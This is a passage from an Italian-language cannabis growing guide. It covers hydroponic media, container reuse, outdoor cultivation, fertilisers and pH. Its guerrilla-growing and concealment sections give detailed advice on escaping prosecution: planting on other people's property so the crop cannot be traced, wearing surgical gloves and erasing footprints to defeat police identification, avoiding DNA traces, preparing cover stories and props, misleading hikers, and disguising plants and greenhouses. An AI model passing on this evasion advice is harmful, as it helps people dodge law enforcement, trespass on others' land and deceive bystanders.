che solo l'acqua proveniente dall'alto di quando in quando laverà qualche deposito di minerali, perciò aggiungi più vermiculite in cima che sul fondo. Fai dei buchi sul fondo delle vaschette, ed aggiungi acqua al vaso. Si fermerà alle radici e le piante avranno tutto il necessario per fiorire. Il serbatoio viene riempito con 4-8 cm di acqua e sistemato in modo che l'acqua si ritiri tra un innaffiamento e l'altro. Quando possibile, usa meno soluzione e più spesso acqua, per girare più ossigeno alle radici nel minor tempo possibile. Se parti per le vacanze, riempi semplicemente i serbatoi fino all'orlo, e le piante avranno un apporto d'acqua per almeno 2 settimane. Un mezzo idroponico veramente eccezionale è la schiuma floreale Oasi. Crea molti buchi in essa per aprirla un po' e comincia all'interno la coltivazione delle piante/cloni, passando dal blocco di schiuma alla lana di roccia in seguito per gli stadi di crescita più avanzati. Molti preferiscono la schiuma floreale, siccome è inerte, e non aggiunge alcun fattore PH. Purtroppo è costosa, e tende a sbriciolarsi facilmente. Non sono inoltre sicuro se sia molto riutilizzabile, ma sembra che sia un prodotto popolare nei negozi di giardinaggio. Si può piantare con più facilità con mezzi idroponici che richiedono poca manutenzione come la lana di roccia. I pezzi di lana di roccia possono essere riutilizzati in tempi successivi, e sono preconfezionati per usarsi in colture idroponiche. Alcuni vantaggi della lana di roccia sono costituiti dal fatto che è impossibile eliminare l'acqua e non c'è bisogno di trapianto. Sistema soltanto la scatola della pianta in cima ad una più grande di lana di roccia e goditi il tuo tempo libero extra. Alcuni si trovano meglio a risparmiare denaro non acquistando lana di roccia ma impiegando il tempo a piantare in terra o in sistemi idroponici come la miscela vermiculite/lava. La perlite va bene, visto che c'è molta luce. La perlite può essere usata al posto o in aggiunta alla lava, che deve essere risciacquata ed è molto più pesante. Ma la lana di roccia ha molti vantaggi che non sono apprezzati fino a quando si è costretti ad impiegare diverse ore a trapiantare in vasi più grandi; pensaci due volte. Non è molto costosa, ed è riutilizzabile. E' più stabile della schiuma floreale, che si schiaccia e si sbriciola facilmente. La lana di roccia trattiene l'acqua 10 volte di più della terra, inoltre è impossibile eliminare l'acqua, perché trattiene sempre un'alta percentuale di aria. Soluzione migliore di tutte, non c'è bisogno di alcun travaso; sistema solamente una scatola di partenza in un cubo di lana di roccia destinata alla crescita, e quando la pianta diventa molto grande, sistema questa scatola su un pannello di lana di roccia. Dal momento che la lana di roccia è facilmente riutilizzabile più e più volte, il costo viene diviso per 3 o 4 raccolti, e finisce per costare non più della vermiculite e della lava, che sono molto più difficili da recuperare per un uso intensivo, da sterilizzare e riutilizzare (ritravasare) in confronto alla lana di roccia. La vermiculite è anche molto pericolosa quando asciutta, e finisce per disperdersi in coltri e nell'aria quando la tocchi (anche bagnata), dal momento che si asciuga sulle dita e diviene volatile. Per questa ragione non è consigliabile la vermiculite al coperto. Gli svantaggi della lana di roccia sono relativamente pochi. E' a PH alcalino, così devi usare qualche cosa nella soluzione nutriente per renderlo acido (5.5) in modo tale da portare i valori della lana di roccia dal 7.7 al 6.5 (l'aceto funziona bene.) E' irritante per la pelle quando è asciutta, ma non è un problema quando è bagnata. Per pretrattare la lana di roccia per piantare, immergila in una soluzione di emulsioni di pesce, minerali in tracce ed acido fosforico (PH basso) per 24 ore, quindi risciacqua. Questo diminuisce la richiesta di PH che si verifica in seguito, quando tamponi il PH della lana di roccia per renderlo abbastanza neutro. Le colture idroponiche dovrebbero essere impiegate al coperto o in serre per velocizzare la crescita delle piante, per ottenere così più gemme in meno tempo. Le colture idroponiche ti permettono di annaffiare le piante giornalmente, e questo accelererà la crescita. La differenza principale tra una coltura idroponica e una in terra è che terreno idroponico o "ambiente" viene impiegato per trattenere l'umidità, ma smaltisce bene, e così non c'è nessun problema di sovrainnaffiamento connesso ad una irrigazione continua. Inoltre, le piante cresciute idroponicamente non ricavano i nutrimenti dal suolo, ma dalla soluzione usata per innaffiare le piante. Le colture idroponiche riducono la preoccupazione di incrementare i minerali nel suolo, e la carenza di ossigeno che può soffocare le radici, così la lisciviazione non è normalmente con le colture idroponiche. Le colture idroponiche permettono di usare contenitori più piccoli per piante della stessa dimensione, in confronto alla crescita in terra. Un vaso da 3 litri può facilmente essere usato per portare una pianta cresciuta idroponicamente alla maturazione. Questo sarebbe difficile da realizzare nella terra, dal momento che i nutrimenti vengono subito consumati e le radici vengono private dell'ossigeno quando fissano a terra le radici. Questo problema non sembra verificarsi quasi più rapidamente per le piante idroponiche, dal momento che le radici possono ancora assorbire nutrimenti da una alimentazione a soluzione costante, e l'ambiente trasmette ossigeno molto più prontamente quando le radici si fissano nel piccolo contenitore. Il nutrimento delle piante deve essere somministrato con molti innaffiamenti, e garantisce al giardiniere di controllare scrupolosamente quali nutrimenti hanno a disposizione le piante nei vari stadi della crescita della pianta. L'innaffiamento può essere automatizzato per certi aspetti con un semplice ed economico apparato di innaffiamento a gocce, in modo da avvantaggiarsene quando possibile. Le colture idroponiche affretteranno il tempo di crescita, così ci vorrà meno tempo tra la semina e il raccolto. Ha senso usare semplici tecniche idroponiche passive quando possibile. Le colture idroponiche non sono certo indicate per la coltivazione all'esterno, a meno che non si possieda una serra. ATTENZIONE: è necessario badare con molta cura alle piante per assicurarsi che non perdano molta acqua e si secchino durante la fase della crescita idroponica, altrimenti le radici saranno compromesse. Se non sei in grado di occuparti del giardino ogni giorno, accertati che le vaschette siano riempite a sufficienza fino al tuo prossimo ritorno, oppure potresti perdere con estrema facilità il tuo raccolto. I metodi idroponici (attivi) più tradizionali non vengono trattati qui. Non vedo un qualche punto nella loro messa in opera più difficile del necessario. E' indispensabile cambiare la soluzione ogni mese se la fai circolare tramite un pompa, ma il sistema del serbatoio elimina questo problema. Risciacqua soltanto il recipiente una volta al mese o giù di lì per prevenire la formazione di sali annaffiando dall'alto della vaschetta o cubo di lana di roccia con acqua pura. Cambia i nutrimenti della pianta spesso per evitare carenze nutritive nelle piante. Consiglio di usare 2 diversi nutrimenti per piante per ciascuna fase della crescita, o 4 nutrimenti in totale, per ridurre i casi di carenza di una qualche sostanza. Cambia la soluzione più spesso se osservi che il PH cala rapidamente (troppo acido). A causa dello scambio dei cationi, la soluzione tenderà a diventare troppo acida col tempo, e questo causerà una indisponibilità di nutrimenti alle piante. Controlla il PH dell'ambiente di crescita ogni volta in cui annaffi per accertarti che non si verifichi alcuna perdita di PH. Con elevate concentrazioni di umidità nell'ambiente idroponico è probabile la formazione di alghe all'interno dei vasetti. Le alghe trasformeranno il pannello di lana di roccia di un colore grigio scuro. Per prevenire questo, stendi una pellicola plastificata sui bordi superiori del pannello di lana di roccia, con dei buchi aperti per farci sporgere all'esterno di essa le piante. E' facile tagliare un pannello impacchettato di lana di roccia in due pezzi, quindi taglia le estremità della plastica che sporgono da ogni pezzo. Ora hai due pezzi di lastra, ciascuno rivestito di plastica eccetto le estremità. Quindi incidi 2 o 3 buchi di 10 cm quadrati in cima per metterci sopra i cubi, e sistema ciascun pezzo in una vaschetta pulita. Ora sei in grado di trattare la lana di roccia come descritto sopra nel capitolo riguardante l'anticipazione della semina. Se coltivi in vasi, vaschette, uno strato di ghiaia sulla cima del vaso può aiutare a ridurre la formazione di alghe, dal momento che assorbe l'acqua molto rapidamente. Le alghe sono soltanto fastidiose e brutte da vedere; non arrecheranno alcun danno alle piante. RICICLAGGIO Serviti di vasi ricavati da contenitori più o meno quadrati del tipo dei brick d'acqua in plastica, ecc.... Più piante staranno in meno spazio ed avranno un'area maggiore per mettere radici se vengono impiegati contenitori quadrati. Questo fa del tuo giardino un centro di riciclaggio, e ti permette di risparmiare montagne di soldi. I bottiglioni di coca da 2 litri vanno bene, ma non sono quadrati. 13 di questi staranno giusti in una vaschetta delle dimensioni di una lettiera per gatti, e porteranno una pianta da un metro alla maturazione per via idroponica. Se puoi disporre di 4 vaschette in un ripostiglio, potrai coltivare 52 piante come questa per via vegetativa. Distanziale per la fioritura. Vecchi secchi, contenitori di plastica da 10-20 litri (industrie alimentari e di vernici, prova a rovistare tra i rifiuti di un imbianchino o di un ristorante), secchi di vernice in cartone, vecchi bidoni dell'immondizia in plastica di ogni misura e sacchi della spazzatura sono tutti usati con successo dai coltivatori di maria. Non usare i cartoni del latte e del succo di frutta per le colture idroponiche a serbatoio, dal momento che sono difficili da sterilizzare, ed introducono colonie di funghi nelle tue vaschette a serbatoio. Materiali inerti, come la plastica, sono la cosa migliore. Assicurati di sterilizzare tutti i contenitori prima di ogni travaso con una soluzione di candeggina al cloro con 2 cucchiai di candeggina per circa 4 litri d'acqua. Lascia il contenitore e il sistema, tipo la lana di roccia, ammollo per diverse ore nella soluzione prima di risciacquarli completamente. COLTIVARE FUORI Coltivare all'aperto è la cosa migliore. L'erba cresciuta all'aperto è di gran lunga più forte, dal momento che riceve più luce, ed è naturalmente più robusta. Non c'è problema di mancanza di luce. Nessun periodo di buio che ti costringa a restar fuori dal tuo luogo di coltivazione. Nessuna bolletta della luce. La luce solare tende a raggiungere più parti della pianta, se la crescita si verifica sotto un'esposizione diretta dei raggi. A differenza della crescita al coperto, le parti basse della pianta saranno sviluppate quasi come la cima. All'aperto, fuori da una serra, ci sono molti fattori che possono distruggere il tuo raccolto. Il cervo cercherà di mangiarle. Scoiattoli ed altri roditori lo stesso. Gli insetti vi si annideranno, ed il vento e la pioggia possono fare a pezzi le tue piccole gemme se sono esposte a violenti temporali. Per queste ragioni l'erba al coperto può essere migliore di quella all'aperto, ma il miglior fumo che abbia mai assaggiato era quello cresciuto all' aperto, quindi pensaci bene: niente batte il sole. Tira su un recinto e assicurati che stia in piedi. Fai visita alla tua piantagione almeno una volta ogni due settimane, e preferibilmente più spesso se c'è carenza d'acqua. E' una buona idea servirsi del terreno se non si possiede una serra, dal momento che le colture idroponiche sono meno affidabili fuori all'aria aperta, a causa soprattutto della forte evaporazione. L'esposizione alla luce è un fattore molto importante nell'individuazione di un luogo per una serra o per un'area all'aperto. Un coltivatore domestico avrà bisogno di sapere dove il sole splende per il periodo più lungo; subentreranno anche la privacy ed altri fattori. Cerca di individuare un punto defilato che riceve luce piena d'inverno da metà mattina a metà pomeriggio, almeno dalle 10 del mattino alle 4 del pomeriggio, preferibilmente dalle 8 alle 5. Ciò sarà veramente indispensabile se vivi a 30 gradi di latitudine nord (California) o superiori dal momento che d'inverno le giornate sono corte. Dal siccome la maggior parte dei giardinieri non vuole usare la serra nel cuore dell'inverno, puoi anche usare il sole invernale come un indice di buone esposizioni alla luce primaverile ed autunnale. Di solito il lato a sud di una collina riceve la maggior parte dei raggi solari. Inoltre, grandi aree aperte al sole sul lato nord della proprietà avranno buone esposizioni a mezzogiorno. Esposizioni ad est e ad ovest possono risultare buone se hanno una piena insolazione di mattina/pomeriggio e anche a mezzogiorno. Alcuni libri riferiscono che le piante rispondono meglio ad un'esposizione solare esclusivamente mattutina, e non altrettanto ad un'esposizione esclusivamente pomeridiana, così se devi scegliere tra le due, sappi che il sole di mattina è meglio. Camuffa la tua serra come un capannone degli attrezzi, o struttura simile, usando soltanto un muro ed un tetto di plastica opaca bianca, PVC, Filon, o vetro, ed usa un materiale colorato alla stessa maniera per il resto del capanno, oppure dipingilo di bianco o d'argento, per farlo somigliare a metallo. Cerca di farlo sembrare come se fosse stato sempre là, circondato da piante ed alberi per nasconderlo da occhi indiscreti quando viene investito dalla luce del sole. Filon (fibre di vetro increspate) o pannelli in PVC possono essere impiegati all'aperto per coprire le giovani piantine cresciute assieme nel giardino. Compra pannelli opachi da serra, e rendili opachi con una tintura bianca (ricavata dalla calce) o con una resina epossidica tinta di bianco o grigio e dipingili con uno strato sottile. Questo farà filtrare più luce solare del PVC o del Filon bianchi, ed in più nasconde le piante. Rivestimenti in resina epossidica conservano il Filon per molte stagioni in più di quanto altrimenti potrebbe durare. Permetterà inoltre di far sembrare il capanno rivestito di metallo, se dipingi i pannelli bianchi di Filon con uno strato sottile di resina tinta di grigio chiaro. La pittura andrà bene lo stesso, ma non potrà proteggere più di tanto. Curati di usare solo il minimo indispensabile, per ridurre il blocco dei raggi solari al minimo. Scava un bel buco, non dipende dalla pianta poter penetrare l'argilla ed il pietrisco a meno che tu non sia sicuro della qualità dello strato superficiale del terreno dell'area. I prati erbosi avrebbero in linea di massima un buon suolo superficiale, ma il tuo prato dietro casa forse no. Solo questo può fare la differenza tra una modesta pianta alta un metro e mezzo e un mostro alto tre metri al momento del raccolto. Coltivare nel terreno è sempre meglio che coltivare in vaso, dal momento che la pianta nel terreno non sarà mai limitata nello sviluppo delle radici. Le piante cresciute nel terreno dovrebbero svilupparsi molto di più, ma richiederanno molto più spazio per ogni pianta, così secondo i piani, non potrai spostarle una volta piantate! Potresti voler tenere le piante all'aperto in vasi in modo da poterli spostare facilmente. Un bel buco consentirà di introdurvi il vaso, in modo da ridurre l'altezza della pianta, qualora il livello del recinto fosse un problema. Molti coltivatori fanno notare che i vasi hanno salvato un raccolto che doveva essere spostato per alcuni inaspettati motivi (tecnici riparatori, stimatori, fuoco, ecc...). E' sempre meglio sistemare un tetto sopra le tue piante all'aperto. Quando ero un ragazzino, avevamo piante che crescevano sopra la staccionata di confine del cortile di casa. Abbiamo cominciato a costruire un tetto di serra per loro, ed un pulotto ci ha beccati a trasportare assi di legno, e pensando che le stessimo rubando (anche se non era così) ha visto al di là recinto noi e le nostre amate piante. Siamo stati arrestati, perché le aveva scoperte. Se avesse visto un capanno coperto da un tetto invece, non ci sarebbe mai stato alcun problema. Morale della storia: costruisci il tetto prima che le piante sbuchino al di sopra del recinto! O falle crescere in modo che stiano al di sotto. Vivi e impara... Quando coltivi lontano da casa, in un terreno incolto, l'acqua è il fattore più determinante, dopo la sicurezza. L'acqua deve trovarsi nelle vicinanze, o vicino alla superficie del suolo, altrimenti la devi portare tu raccolta in recipienti. L'acqua è pesante e questo è un lavoro molto faticoso. Cerca di trovare un'area vicino ad una sorgente d'acqua se possibile, e procurati un secchio da tenere nelle vicinanze per portare l'acqua alla tua piantagione. Un'idea bizzarra a questo riguardo è quella di trovare acqua di alta montagna, ad alta quota, e quindi incanalarla giù in un luogo più basso nelle vicinanze. E' possibile creare pressione dell'acqua in un tubo in modo analogo, e incanalarla in un sistema di irrigazione a gocce che pompa l'acqua alle tue piante in continuazione. Prendi una tanica di benzina da 20 litri e forala con tanti piccoli buchi. fai uscire un tubo dall'apertura principale e assicuralo in qualche modo. Seppellisci il barattolo di metallo in un fiume o ruscello sotto culla, in modo che sia occultata e sommersa. Immergi la tanica in un corso d'acqua o rigagnolo sotto degli anfratti, in modo che sia nascosto e sommerso. Immergi il tubo che esce dalla tanica e fallo scorrere giù dall'altura fino al tuo appezzamento. Una piccola opera di ingegneria può risparmiarti un bel po' di lavoro, e questa attrezzatura può essere usata anno dopo anno. COLTIVAZIONE DI GUERRIGLIA Coltivazione di guerriglia si riferisce alla coltivazione lontano dal proprio possedimento o in una remota ubicazione del possedimento dove la gente raramente si aggira. E' possibile trovare luoghi che per una ragione o per l'altra non sono facilmente accessibili o sono proprietà private. Cerca di coltivare lontano dalla tua proprietà, su una proprietà adiacente, in modo che se la tua piantagione viene scoperta, non sarà facile risalire a te. Se non è nella tua proprietà, nessuno ha testimoniato la tua presenza là, e non c'è alcuna evidenza fisica d ella tua presenza (impronte, impronte digitali, tracce, capelli, ecc...), allora è virtualmente impossibile perseguirti per un qualsiasi reato, anche se gli sbirri pensano di sapere a chi appartiene. Non confidare mai a nessuno cosa stai coltivando. La tua miglior difesa è quella di dire che stavi semplicemente passeggiando attraverso l'area, e che, notato qualcosa di strano, avevi deciso di dare un'occhiata, oppure porta con te una canna da pesca o un binocolo ed afferma di andare a pesca o di osservare gli uccelli. Non rivelare mai a nessuno dove sono localizzate le piante. Non portare visitatori a vederle, a meno che sia tempo di raccolto, e le piante debbano essere colte lo stesso giorno o in quello successivo. Accertati che le tue piante siano nascoste alla vista di chicchessia. Prendi una strada diversa per raggiungerle se non sono in una parte sicura della tua proprietà, e copri le tracce per far credere che non sia una zona praticata. Lascia dei segnali lungo il sentiero, in modo che la gente sul sentiero principale tenda a perdere le indicazioni per l'area coltivata. Non parcheggiare sulla strada principale, trova sempre un posto per parcheggiare che non desti sospetto nella gente che passa per la strada. Tieni sempre una cassetta di "pronto intervento" nell'area se non coltivi vicino a casa. Ogni ragione è buona per trovarsi sul posto; cerca quindi di avere tutti gli oggetti necessari per rendere credibili le balle che eventualmente hai raccontato. Rovi e rametti di edera sono perfetti per aprirsi dei varchi attraverso. L'edera velenosa deve essere lavata via prima che si manifesti una reazione allergica. Il Teknu è una soluzione di sapone speciale che neutralizzerà l'edera velenosa prima che abbia tempo di reagire. Applica il Teknu immediatamente dopo il contatto e fatti una doccia entro 30 minuti. Cerca di piantare sotto alberi, in vicinanza di cespugli e tieni solo alcune piante per ogni singolo punto. Aggiusta o guida le piante affinché si sviluppino ai lati o fai qualcosa per prevenire il classico "albero di Natale" che si nota nella maggior parte delle piante lasciate crescere senza guida. Fissando le cime al terreno consentirai ai rami delle piante di crescere verso il sole, ed aumenterai la produzione, con una stagione di crescita lunga abbastanza. Le piante possono crescere sotto gli alberi se il sole giunge con la giusta angolazione e illumina l'area per diverse ore al giorno. Le piante dovrebbero ricevere almeno 5 ore di luce solare diretta ogni giorno, ed altre 5 ore di luce indiretta. Cerca di procurarti scarpe che puoi usare sulle punte e cancella le impronte dei tuoi passi. Usa guanti chirurgici e cerca di non lasciare impronte digitali sui vasi e su altri oggetti che potrebbero farti identificare dalla pula... nel caso in cui la tua erba venga scoperta da passanti. Tira su un recinto, o le tamie, gli scoiattoli e i cervi mordicchieranno le tue piccoline fino a che non rimarrà nulla. Una rete di filo verde ed una di nylon per polli vanno molto bene e possono essere avvolte attorno agli alberi per creare una barriera impenetrabile. Controllale sempre ed eventualmente riparale ad ogni visita che fai al giardino. Una barriera di lenze da pesca, una a 50 cm e l'altra ad un metro di altezza terrà la maggior parte dei cervi lontano dal tuo raccolto. Cereali per tartarughe gopher sono disponibili per le aree come le montagne della California settentrionale, in cui topi di bosco e tartarughe gopher mangeranno il tuo raccolto se solo tu concederai loro un'opportunità di farlo. Il miglior recinto del mondo non terrà i topi lontano dalle tue piante! Non usare sapone per tenere lontano i cervi perché attirerà i topi! (Il grasso del sapone è commestibile per loro.) Metti dei grani di veleno in una mangiatoia in cui solo i piccoli roditori possono entrare, in modo che gli uccelli e i cervi non possano mangiarli. Disponi il veleno in anticipo, prima di iniziare a piantare. I ratti devono mangiare i grani per diversi giorni prima che abbiano un qualche effetto su di loro. In definitiva, puoi trovare più facile coltivare all'interno di una serra sul retro del tuo cortile piuttosto che cercare di trattenere i ratti dal mangiare la tua piantagione all'aperto. Quando coltivi lontano da casa, in terreni incolti, l'acqua è il fattore più determinante, dopo la sicurezza. La quantità che puoi coltivare è direttamente proporzionale all'acqua disponibile. Se devi raccogliere acqua, portala in un zaino nel caso tu sia stato visto lungo il tragitto che porta alle tue colture; farai sembrare di essere soltanto un escursionista, non un coltivatore. Trasportare le piante che hanno iniziato la crescita vegetativa nell'area di coltivazione è un aspetto molto complesso della coltivazione all'aperto. Di solito, si comincia a coltivare le piante al coperto, o fuori nel giardino, quindi le si trasporta al luogo di coltivazione una volta che si sono saldamente formate. Può essere d'aiuto individuare e separare per prima cosa i maschi dalle femmine così non dovrai imbatterti nello sforzo di trasportare, piantare ed innaffiare le piante maschio. Un suggerimento è quello di usare cubetti di lana di roccia da 8 cm per cominciare al loro interno le pianticelle, quindi metterne 20 di loro in una vaschetta, coprirla con un'altra vaschetta e trasportarle sul posto dove vorrai coltivarle. I cubetti possono essere piantati direttamente nel terreno. Se vieni beccato nel tragitto che ti porta alla piantagione, la scusa di andare a seppellire un gatto morto potrebbe essere efficace: ben pochi ti chiederanno di guardare un cadavere in decomposizione! Sappiamo che un coltivatore all'aperto rinuncia ai semi. Fa molti sacrifici e gli piace praticare la clonazione, così comincia con 200 cloni nel suo ripostiglio, quindi li trasporta all'aperto in scatoloni fino al posto dove devono essere coltivati. Nessun maschio, nessuna differenziazione, nessuna ripulitura dalle erbacce, nessun seme che germina, nessuna impurità genetica, nessun raccolto dedicato ai semi, nessun problema di trasporto, travaso e innaffiamento delle piante, devi solo curarti di raccogliere in un secondo tempo, nessun incubo di impollinazione, nessuna fatica sprecata! CONCIMI Ua il prodotto Super Soil, dato che questo è l'unico concime conosciuto sulla Costa Ovest certificato per dare i migliori risultati. Molte altre marche sono per lo più prodotti per sottobosco ed hanno quindi pochissime sostanze nutritive, sono troppo umidi ecc... Aggiungi vermiculite, perlite o sabbia al Super Soil per incrementare il suo drenaggio ed aerazione. I giardinieri organici usano un composto preparato da loro stessi da una mistura di pollo, mucca o altro concime ed avanzi di cibo, fogliame, erba tagliata, peli di cane ed altri rifiuti incluso il tuo piscio, che ha alti indici di azoto. Il pelo del cane non è consigliato per coltivatori di guerriglia che piantano lontano dalla loro proprietà dove la polizia potrebbe trovarlo. Il test del DNA potrebbe provare che si tratta del tuo cane! Usa cristalli d'acqua P4 nel concime per dare alle piante un minimo di riserva d'acqua per alcuni giorni. Questa sostanza si gonfia in presenza dell'acqua e la trattiene come una spugna, in modo che radici avranno una riserva se una dura siccità rende necessari innaffiamenti costanti. Vacci veramente piano con questa roba, in quanto tende a sedimentarsi sul fondo del vaso e a soffocare le radici più profonde (le radici giovani appena spuntate) arrestando lo sviluppo della pianta. Usala con estrema moderazione, lasciala gonfiarsi per almeno un'ora prima di mescolarla con altro concime. La dimensione della pianta nella terra è direttamente proporzionale alla dimensione del vaso. Se vuoi che la pianta cresca più grande, mettila in un vaso più grande. Di solito, un vaso da 2 litri per una pianta da 30 cm è sufficiente. Una pianta di 2 metri richiederebbe un vaso da almeno 10 litri di volume. Ricorda che i recipienti quadrati hanno un volume maggiore in uno spazio quadrato o rettangolare (come un ripostiglio). Piantare nel terreno è sempre preferibile quando fai uso di concimi. Le piante possono crescere quindi liberamente, senza le restrizioni imposte dalle dimensioni del vaso. Guano di pipistrello, escrementi di pollo o di vermi possono tutti essere impiegati per fertilizzare organicamente il terreno. I concimi possono bruciare, così prima dovrebbero essere ridotti in concime organico con della terra, prima di piantare, per diverse settimane. Si possono utilizzare anche alghe marine per fornire un ricco apporto di minerali in tracce, visto che si decompongono lentamente e nutrono quindi con continuità le piante. Se coltivi all'aperto con buona disponibilità di terra, guarda se nei paraggi ci sono foglie ed altre fonti naturali di azoto ed aggiungile al terreno, insieme con con alcune "dolomite lime" e fertilizzanti ridotti in concime organico. Anche una piccola quantità di nutrimenti per piante come il Miracle Grow può essere ugualmente aggiunta al terreno. (I coltivatori organici aggrottano le ciglia per questa pratica, comunque. La lavorazione di fertilizzanti commerciali produce infatti rifiuti tossici.) Puoi ottenere un buon concime naturale dalle foglie; spargi il fogliame sull'area di coltivazione per mantenerla umida e limita le erbacce vicino alle piante. SOTTERFUGIO E' interessante notare che le piante di marijuana possono realmente essere mescolate tra le altre piante al punto da non essere identificabili da tutti ma soltanto dagli osservatori più accorti. Ricordo che un mio parente durante una visita in Texas mi mostrò il suo mais nell' orto e mi accorsi delle numerose piante di maria soltanto quando mi trovai a meno di un metro da loro. Le piante seminate all'aperto in tarda stagione non diventano mai troppo grandi e non danno mai nell'occhio quando vengono sistemate vicino a piante simili o di dimensioni maggiori. Le piante di dimensioni simili coltivate in mezzo a tanti alberi risulteranno pressoché invisibili nel loro camuffamento. All'aperto il compito è quello di controllare l'accesso all'area per non destare sospetti. Nascondile di qua e di là a casaccio, mai secondo uno schema riconoscibile. Distanziale tra di loro, e distribuiscile sul suolo disponibile in modo che siano costantemente illuminate dal sole, pur essendo nascoste o mescolate. Le reti di recinzione e gruppi di diverse piante messe insieme sono la cosa migliore. Cerca di trovare un tipo di pianta che si armonizzi con le piante circostanti. Somministra azoto alle tue piante se c'è bisogno che siano più verdi per meglio confondersi tra le altre. Alcuni coltivatori usano perfino fiori di plastica rossi, attaccati alla pianta, camuffandola come un cespuglio di fiori. Visita le piante di notte con la luna piena, e se sei visibile ai vicini, fai finta di potare un albero, di falciare il prato, o fai qualcosa nel cortile che ti renda inosservato. Scava un buco e infilaci il vaso con la pianta. L'altezza della pianta sarà ridotta di almeno 30 centimetri. Alcuni coltivatori spuntano la pianta quando è più alta di 30 cm, e crescono le due parti orizzontalmente con un graticcio. La pianta non sarà mai più alta di un metro, e non insospettirà in alcun modo i vicini rompipalle. Questo tipo di pianta può essere coltivata anche nel tuo cortile in piena vista. NUTRIMENTI I nutrimenti per piante hanno tre elementi notevoli che si riveleranno il principale sostegno del tuo giardino: Azoto, Fosforo e Potassio Questi 3 ingredienti di solito sono elencati sull' etichetta frontale della confezione del nutrimento per piante nell'ordine di N-P-K (Nitrogen, Phosphorus, Potassium). Un nutrimento per piante 20-20-20 ha una concentrazione di azoto del 20%. I nutrimenti secondari sono Calcio, Zolfo e Magnesio. Quantità in tracce di boro, rame, molibdeno, zinco, ferro e manganese. A seconda dello stadio di crescita, diversi nutrimenti sono richiesti in momenti differenti. Per lo sviluppo delle radici e la germinazione, sono richiesti nutrimenti con alte concentrazioni di fosforo (high P) e basse concentrazioni di azoto e potassio. La crescita vegetativa ha bisogno di molto azoto, e l'orina umana è una delle migliori fonti, (miscela 250 millilitri di piscio per circa 4 litri d'acqua), anche se non è un fertilizzante completo di per se stesso. 20-20-20 con elementi in tracce dovrebbe renderlo tale; trovo molto valido il Miracle Grow Patio. Curati anche del livello di calcio, magnesio, zolfo e ferro. Questi sono importanti. Un cucchiaio da cucina di dolomite calcarea o idrato di calcio è usato in 4 litri di soluzione per la crescita quando un ambiente idroponico è inizialmente portato avanti, per fornire azoto, calcio e magnesio. Il sale inglese viene impiegato per migliorare i livelli di magnesio e zolfo nella soluzione. Il tabacco cresciuto con nitrato di potassio brucia meglio. Alimenti per piante con PN, fosforo e azoto, (P2N3) sono nutrimenti del tipo Miracle Grow. Questo è un fertilizzante eccellente per la crescita vegetativa, o anche durante il ciclo della fioritura. Considera comunque che il nitrato di potassio è anche noto come Salt Peter, ed è usato per quegli uomini cui viene meno il desiderio sessuale o sono impotenti, o anche nei manicomi. Così se alcune di queste sono destinate alla cottura, potresti usare emulsioni di pesce o altri fertilizzanti completamente organici su queste piante, almeno nelle ultime settimane di fioritura. La maggior parte delle soluzioni idroponiche dovrebbero essere nell'intervallo di 150-600 parti per milione in alimenti solidi disciolti. 300-400 ppm è il valore ottimale. E' possibile testare la tua soluzione o concime con un misuratore della conducibilità elettrica se non sei sicuro di ciò che somministri alle tue piante. Tieni presente che la maggior parte dei valori degli alimenti solidi disciolti sono di solito sul lato basso, e i livelli dei nutrimenti effettivi notevolmente più in alto. E' possibile con colture idroponiche passive, ottenere un incremento dei nutrimenti dopo diverse concimazioni, al punto che l'ambiente idroponico è completamente saturo di nutrimenti. Alimenta la pianta semplicemente con acqua pura di quando in quando, fino a quando noti che le piante non sono tanto verdi, e quindi riprendi con l'alimentazione tradizionale. Il "pompaggio" si verifica quando usi più innaffiamenti per far crescere le piante più velocemente. Questo può essere rischioso se procedi in maniera imprudente, a causa dei problemi di sovrainnaffiamento potenziale. Deve andarci piano e visionare le piante quotidianamente e inizialmente ogni ora, per essere sicuro di non innaffiare a dismisura le piante. Usa miscele di nutrimenti per piante più povere del normale, diciamo un 25%, ed assicurati di filtrarle una volta al mese e di fornire acqua pura alle piante almeno in ogni occasione in cui annaffi. Questo vale specialmente per le piante coltivate in un ambiente a base di terra. L'uso di nutrimenti per piante Oxygen Plus a bassa concentrazione (o un alimento a base di perossido di idrogeno) permette alle radici di respirare meglio e previene i problemi di sovrainnaffiamento. Controlla il terreno per essere sicuro che non ci sia alcuna anomalia nel PH che potrebbe essere dovuta al perossido di idrogeno nella soluzione. (Un coltivatore esperto mi ha detto che non usa H2O2 (HP) a causa dei possibili problemi di PH. Questo non dovrebbe essere un problema se tieni d'occhio il PH e lo correggi nelle soluzioni dell'innaffiamento.) Assicurati che il tuo ambiente abbia un buon drenaggio. A questo punto se innaffi le piante sistemate nel terreno una volta alla settimana, puoi innaffiare ogni 3-5 giorni invece di piantarle in un ambiente con un miglior drenaggio. La perlite o la lava aumenteranno enormemente il drenaggio dell'ambiente e renderanno necessario un innaffiamento più frequente. Questo pomperà le piante; queste tenderanno a crescere più velocemente a causa del migliorato apporto di ossigeno alle radici. Assicurati che l'habitat della pianta sia asciutto prima di un nuovo innaffiamento, in questo modo la pianta cresca più velocemente. Un'alternativa è usare una mistura di nutrimenti per piante standard (più forti) una volta ogni 3 innaffiamenti. I nutrimenti vengono trattenuti nell'ambiente ed immagazzinati nel suolo per un uso successivo. I nutrimenti vengono lavati via con 2 innaffiamenti consecutivi dopo e non si verifica l'accumulo di sali nel suolo (non applicarlo alle colture idroponiche). Smetti di nutrire le piante 2 settimane prima del raccolto, in modo che le piante non abbiano il sapore del fertilizzante. (Questo vale anche per le colture idroponiche.) AVVERTIMENTO: Non sovrafertilizzare. Farà morire le tue piante. Leggi sempre le istruzioni del fertilizzante che devi impiegare. Usa una quantità dimezzata se lo aggiungi all'acqua per ogni nutrimento in terra o in ambiente idroponico, se non sei sicuro di ciò che le tue piante possono assimilare. Passa gradatamente a concentrazioni più elevate di nutrimenti per tutto il tempo. I coltivatori novizi tendono a sovrafertilizzare le loro piante. I sali minerali si accumulano con il tempo a livelli più alti di nutrimenti disciolti. Usa acqua pura per alimentare le colture idroponiche se ritieni che la concentrazione sia troppo elevata. Filtra le piante che stanno nei vasi ogni mese. Se le tue piante sembrano divenire veramente verdi, non somministrare sostanze nutritive per un bel pezzo per accertarti che non siano sovraalimentate. PH E FERTILIZZANTI I PH può fare o disfare la tua soluzione nutritiva. Valori compresi tra 6.7-6.2 sono i più indicati per assicurare che non si verifichi alcun blocco dei nutrimenti. Le colture idroponiche richiedono una soluzione con PH corretto prima di metterle a contatto delle piante. L'acido fosforico può abbassare il livello di PH; la calce o la potassa (carbonato di potassio) 